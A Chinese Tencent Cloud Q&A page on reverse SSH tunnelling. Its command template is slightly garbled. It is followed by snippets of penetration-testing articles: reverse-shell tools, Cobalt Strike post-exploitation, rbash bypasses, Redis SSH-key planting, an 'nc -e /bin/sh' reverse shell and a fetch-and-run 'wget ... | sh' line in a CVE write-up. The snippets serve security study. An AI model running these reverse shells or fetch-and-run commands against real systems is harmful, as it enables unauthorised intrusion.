如何为shell提供"反向ssh"？

为shell提供"反向ssh"，即在远程服务器上建立一个反向SSH隧道，使得远程服务器可以访问到本地计算机。这种方式在远程服务器上运行一个SSH客户端，而不是在本地计算机上运行SSH客户端。这对于在远程服务器上执行需要本地计算机访问的操作非常有用。

要实现这个功能，你需要在远程服务器上运行以下命令：

ssh -R<local_port>:localhost:<remote_port><remote_user>@<remote_host>

其中：

-<local_port>`：本地计算机上的端口，用于远程服务器连接。

-<remote_port>`：远程服务器上的端口，用于本地计算机连接。

-<remote_user>`：远程服务器上的用户名。

-<remote_host>`：远程服务器的主机名或IP地址。

例如，如果你想在远程服务器上建立一个反向SSH隧道，使得远程服务器可以访问本地计算机的8080端口，你可以运行以下命令：

ssh -R 8080:localhost:8080 user@remotehost

在本地计算机上，你需要配置防火墙以允许远程服务器连接到本地计算机的端口。

在这个例子中，远程服务器可以通过访问其自身的8080端口来访问本地计算机的8080端口。

请注意，这种方法可能会带来安全风险，因为它允许远程服务器访问本地计算机的端口。确保在使用此功能时采取适当的安全措施，例如使用密码验证和加密连接。

推荐的腾讯云相关产品：

腾讯云服务器：提供可靠的云计算服务，可以帮助用户快速部署和管理服务器。
腾讯云负载均衡：提供自动分配流量的功能，可以帮助用户在多个服务器之间分配流量，提高服务可用性和性能。
腾讯云SSL证书：提供安全的SSL证书，可以帮助用户加密数据传输，保护用户数据安全。

产品介绍链接地址：

腾讯云服务器：https://cloud.tencent.com/product/cvm
腾讯云负载均衡：https://cloud.tencent.com/product/clb
腾讯云SSL证书：https://cloud.tencent.com/product/ssl

相关·内容

Reverse_SSH：一款基于SSH的反向Shell工具

关于Reverse_SSH Reverse_SSH上一款基于SSH的反向Shell工具，在该工具的帮助下，广大研究人员可以使用SSH来实现反向Shell，并同时拥有下列功能： 1、使用原生SSH语句管理和连接反向...Shell； 2、动态、本地和远程转发； 3、原生SCP和SFTP实现，用于从目标获取文件； 4、完整功能的Windows Shell； 5、实现了客户端&服务器端身份验证，以创建高信任高可用的控制通道.../NHAS/reverse_ssh cd reverse_ssh make cd bin/ 运行下列命令后即可启动服务器： cp ~/.ssh/id_ed25519.pub authorized_keys...-p 3232 ls -t 连接到完整Shell： ssh -J your.rssh.server.com:3232 0f6ffecb15d75574e5e955e014e0546f6e2851ac...（向右滑动，查看更多）或直接使用主机名连接： ssh -J your.rssh.server.com:3232 root.wombo 接下来，可以开启远程转发功能： ssh -R 1234:localhost

1.1K3 0

ReverseSSH：带有反向Shell功能的静态链接SSH服务器

关于ReverseSSH ReverseSSH是一款功能强大的静态链接SSH服务器，ReverseSSH带有反向Shell功能，可以帮助广大研究人员提供强大的远程访问功能。.../反向Shell使用；支持Unix和Windows操作系统；工具要求本工具的正常使用要求主机系统安装并配置好Golang环境。...简而言之，我们可以直接将ReverseSSH当作一台SSH服务器来使用： # 完整交互式Shell访问 ssh -p # 简单的命令执行 ssh -p <.../reverse-ssh # 攻击者主机(默认密码: letmeinbrudipls) attacker$ssh -p 31337 反向Shell场景 # 攻击者主机 attacker...31337 192.168.0.1 reverse-ssh -v -b 0 kali@192.168.0.2 Options: -s, Shell to use for

1.4K1 0

在线调试Github Actions

其基本原理是：tmate运行后会创建一个shell会话，并连接到服务端，然后展示一个ssh地址；访问端使用ssh工具访问这个地址，获取tmate创建的shell。...$ tmate此时，底部会提示访问端使用的ssh地址，如：qsMzYcuPFTFYzKvXa6cgggDyc@lon1.tmate.io。...0x02 使用pytmate代替tmatepytmate是用纯python实现的tmate，不仅提供了终端分享的能力，还增加了对Windows系统的支持以及断开ssh后不会自动退出分享端shell的逻辑...图片0x04 总结在线调试Github Action主要是两种思路：利用第三方终端分享服务（如：tmate等）将内网机器上的Shell暴露出来结合远程Shell工具（如：ssh、wsterm等）和内网端口映射工具...（如：frp等）将Shell暴露出来第一种思路实现相对会简单一些，但功能会受到第三方服务的限制，扩展性不好；第二种思路虽然实现会复杂一些，但扩展性较好，可以根据实际需求使用不同的组合。

1.6K7 0

pwncat：功能强大的反向Shell&BindShell处理工具

关于pwncat pwncat是一款功能强大的反向Shell&BindShell处理工具，同时也是一个针对Linux系统为测试目标的后渗透漏洞利用开发平台。...接收到通信连接之后，pwncat将会设置一些用于处理远程Shell的常见配置： · 禁用远程Shell中的历史记录功能； · 规范化Shell提示符； · 定位需要使用的二进制文件； · 尝试为完整交互式会话生成...生成pty后，它将在raw模式下设置控制终端，因此我们可以通过与SSH类似的方式来跟它进行交互。...pwncat还会同步本地和远程pty的设置（如行、列、TERM环境变量），以确保Shell在交互应用程序（如vim或nano）中正常运行。...Shell pwncat bind://0.0.0.0:4444 pwncat 0.0.0.0:4444 pwncat :4444 pwncat -lp 4444 通过SSH连接 pwncat ssh

1.4K2 0

创建一个简单的SSH服务器

0x02 支持Shell命令 SSH最常用的功能就是远程终端（shell），下面来实现一个支持执行命令的SSH服务： async def start_ssh_server(): import asyncssh...上面的代码在实际使用中发现，对于很快执行完的命令，如：ifconfig等，使用上没什么问题，但是如果输入python命令进入交互式界面，就会卡住没有任务输入。...0x05 支持端口转发 SSH服务器有个非常有用的功能就是端口转发，包括正向端口转发和反向端口转发。...反向端口转发： ssh -R 127.0.0.1:7778:127.0.0.1:7777 root@1.2.3.4 此时，可以将本地的7777端口映射到远程机器上的7778端口。...同时，它也提供了高级可定制化的能力，以便实现较为复杂的功能。

5432 0

【操作】使用 Cobalt Strike 对 Linux 主机进行后渗透

使用【SSH 会话】作为 agent 有两个前提：你已经有1个 Windows Beacon Shell 了。...大多数 UNIX 目标中已经提供了 SSH 程序。功能上已经实现了 Beacon 的基本功能了。...跳板功能：启动 SOCKS 跳板（pivoting） socks 1234 反向端口转发 rportfwd [监听端口] [转发的主机] [转发的端口] rportfwd 命令要求 SSH 守护进程的...Linux Beacon Shell：实际测试中，这个 SSH 会话 Beacon Shell 老掉线，于是就没进行进一步的功能测试。...0x03 总结：经过两种方法上线了 Linux Beacon Shell 之后的拓扑图如下：总之，通过 SSH 会话上线 Linux Beacon Shell，有两个前提：你已经有至少1个 Windows

3.3K1 0

在Linux服务器上安装Web SSH--SSHwifty的部署和使用

作者：Mintimate 博客：https://www.mintimate.cn Mintimate's Blog，只为与你分享 SSHwifty安装.jpg SSH SSH，其全称是Secure Shell...[SSH实现Terminal远程登录] 但是，这样进行服务器远程登录的操作，在服务器端安装SSH情况下受限于：需要SSH客户端（如：Xshell、Putty等） Windows10以后，powershell...SSH的，其他设备，如：树莓派Debian镜像，也是有安装。...start ssh.service # 开机启动SSH systemctl enable ssh.service 宝塔面板安装宝塔面板，主要是方便配置域名解析和Nginx反向代理。...它可以部署在您的计算机或服务器上，以为任何兼容（标准）的Web浏览器提供SSH和Telnet访问接口。 [SSH Web] 通俗地说：安装SSHwifty可以实现Web端SSH控制服务器。

10.3K12 1

带妹玩转vulnhub（一）

它支持两个加密库，OpenSSL和gnutls，并支持许多服务，如anope主题。 InspIRCd基于提供许多模块的模块化IRCd。...ssh登陆这时候回想一下我们所收集到的信息，还有一个ssh没有使用，并且有一个12345这样的密码，所以尝试ssh登陆。 ssh togie@192.168.43.167 ?...我通过Gist创建了一个反向shell，并对本地端口进行监听。第一步执行命令回显 ?...找到一个可以访问的php，然后写上shell就可以了。。? 真的很小白第二步上传反向shell 网上找的反向shell的小马 192.168.43.167/wordpress/wp-admin/index.php?

1.2K2 0

「翻译」如何Bypass rbash

绕过 rbash的方法 1、使用编辑器绕过rbash vi 编辑器 ed编辑器 2、使用一行代码绕过rbash python perl awk 3、通过反向shell绕过rbash 4、使用系统二进制文件绕过...2、ed编辑器你也可以使用ed编辑器，它用起来非常简单就和cat差不多，它会提供内联编辑模式。在你使用以下命令的时候会调用"sh:bourne shell" ed ! '/bin/sh ?...三、通过反向shell绕过rbash 1、python 你也可以选择反向shellcode来绕过rbash，这里我们使用python反向shellcode，这会将"sh:bourne shell"抛给使用...2、PHP 同样的，你可以在需要执行的主机上使用php反向shellcode，在你监听的IP上就会获得反向连接的shell。...六、通过ssh绕过rbash 如果你知道属于在rbash shell部分中ssh的用户认证凭据，那么你可以使用以下命令通过ssh来破解jail 然后绕过rbash获得合适的权限 ssh ignite@

1.2K1 0

CVE-2020-15778：OpenSSH命令注入漏洞复现

作者：Menge&小泫@Timeline Sec 本文字数：1160 阅读时长：3～4min 声明：请勿用作违法用途，否则后果自负 0x01 简介 OpenSSH是SSH（Secure SHell...OpenSSH是个SSH的软件，linux/unix都用openssh软件提供SSH服务。...反引号括起来的字符串被shell解释为命令行，在执行时，shell首先执行该命令行，并以它的标准输出结果取代整个反引号（包括两个反引号）部分。...如例程中的`date -d '-1 day' +%Y%m%d`就是把这条命令的结果赋给变量OPDATE。...2、攻击者可以使用bash绑定外壳之类的各种技巧来获取绑定/反向外壳，或执行“wget https://unknownsource.com/possfullydangerous.sh -O- | sh”

3K3 0

FlowForward 流量转发工具

GitHub项目地址：https://github.com/lyshark/FlowForward 工具提供三种转发模式,正向隧道转发模式,反向纯流量隧道模式,双向隧道转发模式，这三种模式的使用场景各不相同...[+] 本机侦听端口: 8888 [+] 流量转发地址 8.141.58.64:22 Shell> ssh root@localhost -p 8888 root@localhost's password...: 反向纯流量隧道模式当处于反向纯流量隧道模式下用户需要做两件事，服务端需要在本机运行，客户端需要在内网中的一台主机上运行。...Shell> FlowForward.exe ReverseServer --ListenPort 9999 --LocalPort 8888 [*] 反向纯流量隧道模式 (服务端) [+] 侦听端口...Shell> ssh root@localhost -p 8888 root@localhost's password: 双向隧道转发模式当处于双向隧道转发模式下用户需要做两件事，服务端需要在本机运行

7752 0

【Hvv】攻防演练中蓝队的主要工具

简单来说，Whois 就是一个用来查询域名是否已经被注册、注册域名详细信息（如域名所有人、域名注册商）的数据库。...冰蝎集成了命令执行、虚拟终端、文件管理、SOCKS 代理、反弹 shell、数据库管理、自定义代码、Java 内存马注入、支持多种 Web 容器、反向 DMZ 等功能。...FRP 是一个可用于内网穿透的高性能反向代理工具，支持 TCP、UDP、HTTP、HTTPS 等协议类型，主要利用处于内网或防火墙后的机器，对外网环境提供 HTTP 或 HTTPS 服务，支持加密传输和点对点穿...蓝队可利用 ngrok 将边界服务器（如 Web 服务器）作为反向代理服务器，在客户端和目标边界服务器之间建立一个安全通道，客户端可通过反向代理服务器间接访问后端不同服务器上的资源。...Secure Shell（SSH）是专为远程登录会话和其他网络服务提供安全性的协议，支持 SOCKS 代理和端口转发。

2.5K5 0

手把手自动化MySQL数据库备份

在本文中，我们将分享如何为您的数据库创建自动的远程数据库备份。第1步通过SSH登录到数据库服务器。您也可以从终端上进行操作。...ssh you-ssh-user@your-server-ip 第2步在当前用户的主目录中创建一个Shell脚本文件： touch ~/mysql-backup.sh 使用vim打开Shell脚本：...如果不确定，只需将您的ssh-user替换为当前的SSH用户名。 MYSQL_HOST：MySQL主机，通常是localhost。 MYSQL_PORT：MySQL端口号，通常为3306。...第4步向备份Shell脚本授予正确的权限： chmod +x ~/mysql-backup.sh 通过运行以下命令测试备用Shell脚本： ~/mysql-backup.sh 您应该在第3步（DBBACKUPPATH...ls /home/you-ssh-user/backup 第5步安排cron作业以每天午夜运行备份： crontab -e 添加以下条目： 0 0 * * * you-ssh-user /home/you-ssh-user

4021 0

利用 ssh 内网穿透实现远程局域网内 Win10 桌面

，然后在目标 win10 主机上，使用自带的openssh 软件运行ssh反向代理命令： ssh -R *:3389:127.0.0.1:3389 root@jokeysoft.com 就可以通过 “...("WScript.Shell") WshShell.Run chr(34) & "C:\Users\dell\start_ssh_tunnel.bat" & Chr(34), 0 Set WshShell...如果长时间与ssh 反向代理主机没有数据包通信，ssh 通信隧道会断开，可以通过配置心跳机制保持 ssh 代理通道不中断： ssh 客户端：添加~/.ssh/config文件，粘贴如下内容： Host...60 ClientAliveCountMax 10 至此，启动远程桌面软件输入 ssh 反向代理的外网地址和端口就可以使用 ssh 实现的内网穿透来远程局域网的主机了。...捕获-1-300x245.png 总结这里抛砖引玉实现了在外网访问局域网内 Win 10 远程桌面服务的反向代理，实际上 ssh 代理通道可以实现很多类似场景的通信需求，大家按照实际需求开动脑筋使用即可

3.7K10 3

内网渗透-代理篇

使用TCP协议传输数据，因而不提供如传递ICMP信息之类的网络层相关服务。...反向代理：由内网主机主动交出权限到代理机器，然后本地去连接形成反向代理。例如：VPS监听本地端口，已控内网服务器来连接此端口，形成一个隧道。如果内网设备连接外网，就无法回弹只能再想其他办法。...反向连接场景：目标设备在内网，防火墙阻止外来流量。...命令二：调用shell #调用shell，将目标机器cmd shell转发到本地12345端口 shell 12345 #nc连接,得到cmdshell nc 127.0.0.1 12345 ?...---- 2.ssh反向代理将kali本地端口镜像转发到红帽，所有访问SSH服务器（红帽）的镜像端口即是访问kali的端口。

4.8K3 1

Linux 中 ssh 配置无密码登陆完整步骤以及需要注意的问题

文章目录前言一、何为 SSH 二、ssh 配置无密码登陆步骤 2.1、原理解释 2.2、在自己的 Linux 系统上生成 SSH 密钥和公钥三、登录验证总结 ---- 前言对于 Hadoop...Hadoop 并没有提供 SSH 输入密码登陆的形式，因此为了能够顺利登陆每台机器，需要将所有机器配置为名称节点可以无密码登陆的形式。 ?...---- 一、何为 SSH ssh - 安全外壳协议 SSH 为 Secure Shell 的缩写，由 IETF 的网络工作小组(Network Working Group)所制定；SSH 为建立在应用层和传输层基础上的安全协议...SSH 是目前较可靠，专为远程登录会话和其他网络服务提供安全性的协议。利用 SSH 协议可以有效防止远程管理过程中的信息泄露问题。...Hadoop 并没有提供 SSH 输入密码登陆的形式，因此为了能够顺利登陆每台机器，需要将所有机器配置为名称节点可以无密码登陆的形式。

2.9K2 1

内网渗透之隐藏通信隧道技术

何为隐藏通信隧道技术？...在攻击机上使用ifconfig查看IP发现已经是受害机的IP (2).反向shell 即受害及主动来连接攻击机，这种方法在渗透测试中更为常用，因为它可以突破许多边界设备的封锁在攻击机上执行 nc -lvp...可以看到已经接收到了win server2008 的shell 使用nc反向连接powercat 在攻击机中执行 nc -l -p 5678 -vv 开启监听本机5678端口 ?...应用层 1.SSH 几乎所有的unix/linux主机都支持SSH协议，都可以通过SSH通信而在现实情况中，网管员经常会使用SSH连接来远程管理内网中的主机，所以一般情况下，边界设备并不会拦截SSH流量...，加之SSH流量是加密的，一般的入侵检测工具很难检测出SSH流量的异常，所以渗透测试人员往往能通过SSH建立起一些其他隧道难以建立的TCP通信隧道 SSH常见参数 -C 压缩传输 -f 后台执行SSH

1.7K4 0

反弹shell的学习总结 - Part 1

数据库，并提供多种语言的API。...nc监听端口已经反弹回来shell ? 1.4 Redis的其他应用如果Redis以root身份运行，可以给root账户写入SSH公钥文件，直接通过SSH登录受害服务器。...1.4.1 写ssh-keygen公钥然后使用私钥登录利用条件： Redis服务使用ROOT账号启动服务器开放了SSH服务，而且允许使用密钥登录，即可远程写入一个公钥，直接登录远程服务器操作流程：...Step 1：首先在本地生成一对密钥： root@kali:~/.ssh# ssh-keygen -t rsa ?...shell，其参数如下： - IPAddress 反向连接时设置的IP - Port 正向连接时设置的端口，前面要写上-Bind参数 - Reverse 反向连接 - Bind 正向连接反向连接：Invoke-PowerShellTcp

9342 1

内网全局代理工具及特征分析

代理分为正向代理和反向代理，正向代理常适用于外网可以直接访问到web服务器的情况下，反向代理适用于服务器可以出网，但是外部无法直接访问服务器的情况，针对大型企业，现在几乎都是CDN，负载均衡等设备，所以个人认为现在反向代理更常见于渗透攻击中...（正向代理这儿不演示，反向代理应用更多些，因为反向代理主要适用于服务器无法从外部访问，但是服务器可以访问外部）： 1....Shell上执行：ewforWin.exe -s rssocks-d “接收端IP” -e “自定义端口2” ? ? ? 4. 配置Proifier ? ?...总结如果利用ew进行全局代理，配合加密得shell，通过流量回溯极难发现，通过服务器本地日志查看，进程查看，网络排查容易发现痕迹，且ew会被部分杀软查杀。...通过Shell上传对应的Tunnel脚本，访问： ? 表你是脚本运行正常。 2.

1.7K2 0

如何将简单的Shell转换成为完全交互式的TTY

除了没有正确处理SIGINT（信号）之外，这些“哑”shell还有其它诸多缺点：一些命令如su和ssh，需要一个正确的终端才能运行通常不显示STDERR 无法正常使用vim等文本编辑器没有完成标签...VICTIM IP: 10.0.3.7 KALI IP: 10.0.3.4 生成反向shell命令我们首先使用netcat来获取最常见的反向shell： nc -e /bin/sh 10.0.3.4...Pentest Monkey有篇关于反向shell的cheatsheet，为我们提供了一些不同的方法。但我更热衷于使用Metasploit的msfvenom一行生成命令。...Metasploit在“cmd/unix”下，有几个可用于生成单行绑定或反向shell的payload： ?...下一个前台shell将重新打开反向shell，但格式化将关闭。最后，重新初始化终端。 ? 注意：我没有再次键入nc命令（如上图所示）。我实际上进入到了fg（前台），但这并没有被打印出来。

5.2K4 0

点击加载更多

扫码

添加站长进交流群

领取专属 10元无门槛券

手把手带您无忧上云